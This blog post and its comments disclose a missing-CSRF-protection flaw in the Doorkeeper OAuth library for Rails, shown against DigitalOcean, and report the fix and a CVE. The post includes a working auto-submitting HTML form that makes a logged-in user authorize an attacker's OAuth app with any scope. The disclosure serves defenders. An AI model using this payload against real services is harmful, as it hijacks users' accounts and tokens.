DigitalOcean uses Doorkeeper, the most popular OAuth Provider library for rails apps and it manages clients, tokens, scopes and validations out of box.
Then I looked into Doorkeeper's commit history... it turns out Doorkeeper's endpoints never had CSRF protection, because they inherit directly from ActionController::Base, not ApplicationController.
Which means any HTML page on the Internet can get your access_token with arbitrary scope (such as "email", "dialogs" or "withdraw_money") from any Doorkeeper-compatible Rails app you are logged in. Example:
<form action="https://cloud.digitalocean.com/v1/oauth/authorize?response_type=code" method="POST">
<input name="client_id" value="EVIL_APP_ID" />
<input name="redirect_uri" value="http://CALLBACK" />
<input name="scope" value="ANY SCOPE" />
</form><script>document.forms[0].submit()</script>
This is a big deal. You must upgrade Doorkeeper NOW.
P.S. It's funny that Sergey is not a Rails developer so he simply tried to send a request without authenticity_token. Frankly, I wouldn't try that - Rails has built-in CSRF protection everywhere, why even bother? That's why.
P.S 2 It's a bit disappointing neither DigitalOcean nor Doorkeeper (Applicake?) team did announce such a severe vulnerability, so I do it for them.
Thanks again for the research Egor!
ReplyDeleteI have nothing to do with this - it's Sergey who found it. He just didn't realize at first what a big bug he spotted.
DeleteBig thanks to Sergey for reporting it responsibly! Just to be clear, this was fixed on DigitalOcean. One of our engineers reported and fix this in upstream Doorkeeper as well.
DeleteThe info for contacting our security team can be found here:
https://www.digitalocean.com/security/
maybe bold/highlight/spotlight "This is a big deal. You must upgrade Doorkeeper NOW." ?
ReplyDeleteIn which version of Doorkeeper was this actually fixed?
ReplyDeleteI haven't checked, but as per Andrew above 'upstream' would be the 'master' branch. It'll get tagged in the latest release, if it hasn't already been done. Check changelog.
ReplyDeleteThanks Egor for post ;)
ReplyDeleteCan confirm that it fixed now - https://github.com/doorkeeper-gem/doorkeeper/commit/c1b5c45e2c42c0191ca9f12a2836e31ee1a8de57
Looks like it was assigned a CVE http://seclists.org/oss-sec/2014/q4/1076
ReplyDelete